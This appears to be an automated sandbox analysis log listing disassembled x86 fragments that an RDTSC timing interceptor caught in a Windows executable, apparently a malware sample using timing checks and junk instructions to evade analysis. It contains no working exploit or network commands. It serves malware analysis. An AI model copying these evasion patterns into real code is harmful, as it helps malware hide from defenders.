Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ED3E9 second address: 5ED3F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ED3F5 second address: 5ED3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ED3F9 second address: 5ED40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C902634Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ED544 second address: 5ED562 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4C9084164h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F4616 second address: 5F461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F461A second address: 5F4648 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FA4C9084158h 0x00000012 pop eax 0x00000013 jl 00007FA4C908416Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA4C9084161h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F4210 second address: 5F4214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F4214 second address: 5F421A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F439B second address: 5F43A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F43A1 second address: 5F43A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5F43A7 second address: 5F43B3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA4C902634Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 600CC4 second address: 600CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 600CC8 second address: 600CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 600CD6 second address: 600CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 600CDA second address: 600CF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5264BF second address: 5264C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5264C8 second address: 5264CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5264CE second address: 5264D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5264D7 second address: 5264FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FA4C902634Eh 0x00000011 jmp 00007FA4C902634Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 605EC1 second address: 605EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 60ACB5 second address: 60ACBD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 60ACBD second address: 60ACC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6115BE second address: 6115E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026359h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FA4C9026346h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6115E4 second address: 61160C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA4C9084162h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FA4C9084156h 0x00000015 jo 00007FA4C9084156h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 61160C second address: 611610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 611610 second address: 611616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 611616 second address: 611644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA4C9026364h 0x0000000c jmp 00007FA4C902634Fh 0x00000011 jmp 00007FA4C902634Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 620084 second address: 620094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA4C9084156h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 620350 second address: 62035D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5358E3 second address: 5358E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6207A8 second address: 6207AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6207AC second address: 6207B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6207B2 second address: 6207B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 62090F second address: 620913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 620913 second address: 62092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4C902634Fh 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 62092E second address: 620948 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA4C9084163h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 627237 second address: 627240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 626DA3 second address: 626DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C908415Ah 0x00000009 jmp 00007FA4C908415Bh 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 626DC4 second address: 626DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jnc 00007FA4C9026346h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 626F3D second address: 626F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 63E0BA second address: 63E0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 63DF19 second address: 63DF4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FA4C908415Bh 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007FA4C9084169h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 63DF4D second address: 63DF66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026355h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 649AEB second address: 649B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084169h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 64C68D second address: 64C691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 64C691 second address: 64C6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084166h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 64C81B second address: 64C81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 64C81F second address: 64C839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA4C9084162h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 64C839 second address: 64C84C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C902634Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6747FA second address: 674815 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA4C9084161h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 674815 second address: 674829 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FA4C9026346h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 674829 second address: 674840 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FA4C9084158h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6735C9 second address: 6735F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA4C902634Fh 0x0000000c jmp 00007FA4C9026352h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673764 second address: 673778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jbe 00007FA4C9084172h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673778 second address: 67377C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673A2F second address: 673A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673A33 second address: 673A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA4C9026351h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673FD3 second address: 673FDD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673FDD second address: 673FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA4C9026359h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 673FFC second address: 67401A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C9084160h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67401A second address: 674024 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9026346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 674162 second address: 674166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 674166 second address: 674189 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FA4C9026359h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 674189 second address: 6741AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FA4C9084158h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 674487 second address: 6744A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FA4C9026346h 0x0000000b jmp 00007FA4C9026352h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6771F5 second address: 677210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA4C9084162h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67749F second address: 6774A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 677588 second address: 677595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FA4C9084156h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 677595 second address: 6775BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dl, bh 0x0000000e push 00000004h 0x00000010 xor dword ptr [ebp+122D1DB1h], edx 0x00000016 push 2D6DF673h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FA4C9026348h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6775BA second address: 6775C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 6775C0 second address: 6775C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 677827 second address: 677830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 677830 second address: 677834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 678B3C second address: 678B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FA4C908415Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67A9F2 second address: 67AA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA4C9026356h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67A509 second address: 67A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67C5EE second address: 67C5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67C5F3 second address: 67C612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67C612 second address: 67C616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 67C616 second address: 67C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DF07A6 second address: 4DF07AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DF07AA second address: 4DF07AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DF07AE second address: 4DF07B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DF07B4 second address: 4DF07D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0E83 second address: 4DC0ED2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA4C9026358h 0x00000008 or ecx, 5C665F48h 0x0000000e jmp 00007FA4C902634Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 45E446BFh 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FA4C9026352h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0ED2 second address: 4DC0ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0ED6 second address: 4DC0EF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026358h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 4DC0EF2 second address: 4DC0F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA4C9084164h 0x00000011 and ch, 00000068h 0x00000014 jmp 00007FA4C908415Bh 0x00000019 popfd 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FA4C9084160h 0x00000026 sub eax, 589D88C8h 0x0000002c jmp 00007FA4C908415Bh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007FA4C9084166h 0x0000003a sub si, 0B28h 0x0000003f jmp 00007FA4C908415Bh 0x00000044 popfd 0x00000045 rdtsc
